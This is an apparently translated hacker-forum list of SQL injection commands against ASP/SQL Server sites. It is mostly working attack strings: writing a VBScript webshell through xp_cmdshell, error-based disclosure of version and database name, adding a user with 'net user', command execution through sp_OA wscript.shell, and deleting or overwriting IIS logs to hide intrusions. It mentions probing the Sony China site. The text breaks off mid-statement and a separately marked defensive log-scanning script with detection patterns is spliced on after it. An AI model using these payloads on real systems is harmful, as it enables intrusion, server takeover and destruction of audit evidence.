Some useful ASP injection-related commands

Source: Internet
Author: User
Tags: sql server driver, odbc sql server driver

Hello everyone, we are pt007 and solaris7 (QQ: 7491805 / 564935). You are welcome to come and exchange ideas with us :).

1. http://192.168.1.5/display.asp?Keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> c:\mu.asp';--
Uses the ^ escape character so that cmd.exe passes the angle brackets through echo literally when writing the ASP file.

2. http://192.168.1.5/display.asp?Keyno=188 and 1=(select @@VERSION)
Displays the SQL Server version: the comparison forces a conversion of the version string to int, and the error message echoes the string back:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
/Display.asp, Row 17
3. When testing the Sony China website for vulnerabilities, I had clearly determined that the vulnerability existed, but could not find the corresponding type among the three vulnerability types. By accident I thought of the keyword "in", which can be used in SQL, for example "select * from mytable where id in (1)", where the value in the brackets is the data we submit. The result is exactly the same as the query "select * from mytable where id = 1". So when you access the page, add ") and 1 = 1 and 1 in (1" after the URL; the original SQL statement becomes "select * from mytable where id in (1) and 1 = 1 and 1 in (1)", and the long-awaited page appears. For the moment, this type of vulnerability is called the "include number type". If you are smart, you will already have thought of the "include number type". By the way, it is caused by a query statement similar to "select * from mytable where name in ('firstsee.

4. http://192.168.1.5/display.asp?Keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='x' and name='xp_cmdshell')
Determines whether the xp_cmdshell extended stored procedure exists (xtype 'x' marks extended stored procedures in sysobjects).

5. http://192.168.1.5/display.asp?Users%20/c%20net user test ptlove /add
Writes command lines and executable programs into the Startup group.

6. http://192.168.1.5/display.asp?Keyno=188%20and%200<>db_name()
Reveals the current database name through the same int-conversion error:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/Display.asp, Row 17

7. List all database names on the server: select * from master.dbo.sysdatabases

8. Running CMD commands on an injectable SQL Server does not require xp_cmdshell; the OLE automation procedures (sp_OACreate / sp_OAMethod) can drive wscript.shell instead, with the command output read back from a temporary file into a table:
create table mytmp (info VARCHAR(400), ID int IDENTITY(1,1) not null)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell', @shell output
EXEC sp_oamethod @shell, 'run', null, 'cmd.exe /c dir c:\ > c:\temp.txt', 0, true
-- Note: the run parameter "true" means wait for the program to finish before returning. It must be used for long-running commands such as ping.

EXEC sp_oacreate 'scripting.filesystemobject', @fso output
EXEC sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt'
-- Because the fso OpenTextFile method returns a TextStream object, @file is an object token.

WHILE @shell > 0
BEGIN
EXEC sp_oamethod @file, 'Readline', @out out
insert into mytmp (info) VALUES (@out)
EXEC sp_oagetproperty @file, 'AtEndOfStream', @isEnd out
IF @isEnd = 1 BREAK
ELSE CONTINUE
END

DROP TABLE mytmp

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell', @shell output
EXEC sp_oamethod @shell, 'run', null, 'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" > c:\temp.txt', 0, true
EXEC sp_oacreate 'scripting.filesystemobject', @fso output
EXEC sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt'
WHILE @shell > 0
BEGIN
EXEC sp_oamethod @file, 'Readline', @out out
insert into mytmp (info) VALUES (@out)
EXEC sp_oagetproperty @file, 'AtEndOfStream', @isEnd out
IF @isEnd = 1 BREAK
ELSE CONTINUE
END

Adding the web user to the Administrators group, as a single line:
DECLARE @shell int declare @fso int declare @file int declare @isEnd bit declare @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell', @shell output EXEC sp_oamethod @shell, 'run', null, 'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" > c:\temp.txt', 0, true EXEC sp_oacreate 'scripting.filesystemobject', @fso output EXEC sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt' WHILE @shell > 0 begin exec sp_oamethod @file, 'Readline', @out out insert into mytmp (info) VALUES (@out) EXEC sp_oagetproperty @file, 'AtEndOfStream', @isEnd out IF @isEnd = 1 BREAK ELSE CONTINUE END

Executing an EXE program, as a single line:
DECLARE @shell int declare @fso int declare @file int declare @isEnd bit declare @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell', @shell output EXEC sp_oamethod @shell, 'run', null, 'cmd.exe /c cscript.exe E: jeea.net. cnscoreftsimagesiis. vbs lh1 c:\ > c:\temp.txt', 0, true EXEC sp_oacreate 'scripting.filesystemobject', @fso output EXEC sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt' WHILE @shell > 0 begin exec sp_oamethod @file, 'Readline', @out out insert into mytmp (info) VALUES (@out) EXEC sp_oagetproperty @file, 'AtEndOfStream', @isEnd out IF @isEnd = 1 BREAK ELSE CONTINUE END

The following two methods can be used to execute a CMD command from SQL:

Deleting the 7.18 log (ex050718.log) first:
(1) exec master.dbo.xp_shareshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt'
(2) DECLARE @shell int declare @fso int declare @file int declare @isEnd bit declare @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell', @shell output EXEC sp_oamethod @shell, 'run', null, 'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt', 0, true EXEC sp_oacreate 'scripting.filesystemobject', @fso output EXEC sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt' WHILE @shell > 0 begin exec sp_oamethod @file, 'Readline', @out out insert into mytmp (info) VALUES (@out) EXEC sp_oagetproperty @file, 'AtEndOfStream', @isEnd out IF @isEnd = 1 BREAK ELSE CONTINUE END

Another example, replacing the 7.18 log file with the 7.16 one:
(1) exec master.dbo.xp_shareshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt'
(2) DECLARE @shell int declare @fso int declare @file int declare @isEnd bit declare @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell', @shell output EXEC sp_oamethod @shell, 'run', null, 'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt', 0, true EXEC sp_oacreate 'scripting.filesystemobject', @fso output EXEC sp_oamethod @fso, 'opentextfile', @file out, 'c:\temp.txt' WHILE @shell > 0 begin exec sp_oamethod @file, 'Readline', @out out insert into mytmp (info) VALUES (@out) EXEC sp_oagetproperty @file, 'AtEndOfStream', @
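A defender-side complement to the list above, added here as an example that is not part of the original article: a small Python scanner that URL-decodes the cs-uri-query field of IIS W3C log lines and flags the patterns used in these commands (the @@VERSION and db_name() error probes, xp_cmdshell, the sp_OA* OLE automation procedures, sysobjects/sysdatabases enumeration, the ") and 1=1 and 1 in (" trick, and stacked queries). The log excerpt, the client addresses and the signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not taken from the page); the query strings
# mirror the injection patterns listed above against /display.asp?Keyno=.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-18 10:01:02 10.0.0.9 GET /display.asp Keyno=188 200
2005-07-18 10:01:05 10.0.0.9 GET /display.asp Keyno=188%20and%201=(select%20@@VERSION) 500
2005-07-18 10:01:09 10.0.0.9 GET /display.asp Keyno=188%20and%201=(SELECT%20count(*)%20FROM%20master.dbo.sysobjects%20WHERE%20xtype='x'%20and%20name='xp_cmdshell') 500
2005-07-18 10:01:15 10.0.0.9 GET /display.asp Keyno=188;DECLARE%20@shell%20int%20EXEC%20sp_oacreate%20'wscript.shell',@shell%20output 500
2005-07-18 10:02:00 10.0.0.9 GET /display.asp Keyno=1)%20and%201=1%20and%201%20in%20(1 200
2005-07-18 10:03:00 10.0.0.7 GET /display.asp Keyno=2000 200
"""

# Signatures derived from the techniques on this page; they are applied after
# URL decoding and case folding so that %20, + and mixed case do not evade them.
SIGNATURES = {
    "version_probe": re.compile(r"@@version|db_name\s*\("),
    "xp_cmdshell": re.compile(r"xp_cmdshell"),
    "ole_automation": re.compile(r"sp_oa(create|method|getproperty)"),
    "catalog_enum": re.compile(r"master\.dbo\.sys(objects|databases)"),
    "in_clause_tautology": re.compile(r"\)\s*and\s*1\s*=\s*1\s*and\s*1\s+in\s*\("),
    "stacked_query": re.compile(r";\s*(exec|declare)\b"),
}

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        # Spaces inside the query are %20/+ encoded, so a plain split is safe.
        parts = line.split(" ", len(fields) - 1)
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))

def scan(text):
    """Return (time, client ip, [matched signature names]) for suspicious requests."""
    hits = []
    for rec in parse_w3c(text):
        decoded = unquote_plus(rec["cs-uri-query"]).lower()
        names = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if names:
            hits.append((rec["time"], rec["c-ip"], names))
    return hits
```

Calling scan(SAMPLE_LOG) flags the four probing requests from 10.0.0.9 and leaves the two plain Keyno lookups alone; feeding it a real ex*.log file is a quick way to check whether the pattern set above has been tried against a server.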
